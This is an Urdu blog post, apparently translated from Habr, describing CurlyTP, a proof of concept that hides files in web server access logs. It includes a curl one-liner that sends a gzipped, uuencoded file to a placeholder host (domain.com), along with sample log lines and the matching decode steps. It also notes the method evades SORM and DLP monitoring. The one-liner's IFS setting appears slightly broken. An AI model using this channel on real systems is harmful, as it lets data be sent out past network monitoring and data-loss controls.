پرو ہوسٹر > بلاگ > انتظامیہ > سرور لاگز کے ذریعے خفیہ پیغامات کا تبادلہ

سرور لاگز کے ذریعے خفیہ پیغامات کا تبادلہ

ویکیپیڈیا کی تعریف کے مطابق، ڈیڈ ڈراپ ایک سازشی ٹول ہے جو خفیہ مقام استعمال کرنے والے لوگوں کے درمیان معلومات یا کچھ اشیاء کا تبادلہ کرتا ہے۔ خیال یہ ہے کہ لوگ کبھی نہیں ملتے ہیں - لیکن وہ پھر بھی آپریشنل حفاظت کو برقرار رکھنے کے لیے معلومات کا تبادلہ کرتے ہیں۔

چھپنے کی جگہ توجہ مبذول نہیں ہونی چاہئے۔ اس لیے، آف لائن دنیا میں وہ اکثر عقلمند چیزیں استعمال کرتے ہیں: دیوار میں ڈھیلی اینٹ، لائبریری کی کتاب، یا درخت میں کھوکھلا۔

انٹرنیٹ پر بہت سے خفیہ کاری اور گمنامی کے ٹولز موجود ہیں، لیکن ان ٹولز کے استعمال کی حقیقت توجہ مبذول کراتی ہے۔ اس کے علاوہ، انہیں کارپوریٹ یا حکومتی سطح پر بلاک کیا جا سکتا ہے۔ کیا کرنا ہے؟

ڈویلپر ریان فلاورز نے ایک دلچسپ آپشن تجویز کیا۔ کسی بھی ویب سرور کو چھپنے کی جگہ کے طور پر استعمال کریں۔. اگر آپ اس کے بارے میں سوچتے ہیں، تو ویب سرور کیا کرتا ہے؟ درخواستیں وصول کرتا ہے، فائلیں جاری کرتا ہے اور نوشتہ جات لکھتا ہے۔ اور یہ تمام درخواستوں کو لاگ کرتا ہے، یہاں تک کہ غلط بھی!

یہ پتہ چلتا ہے کہ کوئی بھی ویب سرور آپ کو لاگ میں تقریبا کسی بھی پیغام کو محفوظ کرنے کی اجازت دیتا ہے۔ پھول حیران تھے کہ اسے کیسے استعمال کیا جائے۔

وہ یہ اختیار پیش کرتا ہے:

  1. ایک ٹیکسٹ فائل (خفیہ پیغام) لیں اور ہیش (md5sum) کا حساب لگائیں۔
  2. ہم اسے انکوڈ کرتے ہیں (gzip+uencode)۔
  3. ہم سرور کو جان بوجھ کر غلط درخواست کا استعمال کرتے ہوئے لاگ پر لکھتے ہیں۔

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

کسی فائل کو پڑھنے کے لیے، آپ کو ان کارروائیوں کو الٹ ترتیب میں انجام دینے کی ضرورت ہے: فائل کو ڈی کوڈ اور ان زپ کریں، ہیش کو چیک کریں (ہیش کو کھلے چینلز پر محفوظ طریقے سے منتقل کیا جا سکتا ہے)۔

خالی جگہوں سے تبدیل کیا جاتا ہے۔ =+=تاکہ ایڈریس میں کوئی خالی جگہ نہ رہے۔ پروگرام، جسے مصنف CurlyTP کہتے ہیں، بیس 64 انکوڈنگ کا استعمال کرتا ہے، جیسے ای میل منسلکات۔ درخواست ایک مطلوبہ لفظ کے ساتھ کی گئی ہے۔ ?transfer?تاکہ وصول کنندہ اسے نوشتہ جات میں آسانی سے تلاش کر سکے۔

ہم اس معاملے میں نوشتہ جات میں کیا دیکھتے ہیں؟

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

جیسا کہ پہلے ہی ذکر کیا جا چکا ہے، خفیہ پیغام موصول کرنے کے لیے آپ کو الٹ ترتیب میں آپریشن کرنے کی ضرورت ہے:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

عمل خود کار طریقے سے آسان ہے. Md5sum مماثل ہے، اور فائل کے مندرجات اس بات کی تصدیق کرتے ہیں کہ ہر چیز کو صحیح طریقے سے ڈی کوڈ کیا گیا تھا۔

طریقہ بہت آسان ہے۔ "اس مشق کا مقصد صرف یہ ثابت کرنا ہے کہ فائلوں کو معصوم چھوٹی ویب درخواستوں کے ذریعے منتقل کیا جا سکتا ہے، اور یہ سادہ ٹیکسٹ لاگ کے ساتھ کسی بھی ویب سرور پر کام کرتا ہے۔ بنیادی طور پر، ہر ویب سرور ایک چھپنے کی جگہ ہے!" پھول لکھتے ہیں۔

بلاشبہ، طریقہ صرف اس صورت میں کام کرتا ہے جب وصول کنندہ کو سرور لاگز تک رسائی حاصل ہو۔ لیکن اس طرح کی رسائی فراہم کی جاتی ہے، مثال کے طور پر، بہت سے میزبانوں کی طرف سے.

اسے کیسے استعمال کریں؟

ریان فلاورز کا کہنا ہے کہ وہ انفارمیشن سیکیورٹی کے ماہر نہیں ہیں اور CurlyTP کے ممکنہ استعمال کی فہرست مرتب نہیں کریں گے۔ اس کے لیے، یہ تصور کا صرف ایک ثبوت ہے کہ جو مانوس ٹولز ہم ہر روز دیکھتے ہیں وہ غیر روایتی طریقے سے استعمال کیے جا سکتے ہیں۔

درحقیقت، اس طریقہ کار کے دوسرے سرور پر بہت سے فوائد ہیں جیسے "چھپاتے ہیں" ڈیجیٹل ڈیڈ ڈراپ یا PirateBox: اس کے لیے سرور سائیڈ پر خصوصی ترتیب یا کسی خاص پروٹوکول کی ضرورت نہیں ہے - اور ٹریفک کی نگرانی کرنے والوں میں شک پیدا نہیں کرے گا۔ اس بات کا امکان نہیں ہے کہ SORM یا DLP سسٹم کمپریسڈ ٹیکسٹ فائلوں کے لیے URL کو اسکین کرے گا۔

یہ سروس فائلوں کے ذریعے پیغامات کی ترسیل کا ایک طریقہ ہے۔ آپ کو یاد ہے کہ کچھ جدید کمپنیاں کیسے جگہ دیتی تھیں۔ HTTP ہیڈر میں ڈویلپر کی نوکریاں یا HTML صفحات کے کوڈ میں۔

سرور لاگز کے ذریعے خفیہ پیغامات کا تبادلہ

خیال یہ تھا کہ صرف ویب ڈویلپر ہی اس ایسٹر ایگ کو دیکھیں گے، کیونکہ ایک عام آدمی ہیڈر یا ایچ ٹی ایم ایل کوڈ کو نہیں دیکھے گا۔

سرور لاگز کے ذریعے خفیہ پیغامات کا تبادلہ

ماخذ: www.habr.com

نیا تبصرہ شامل کریں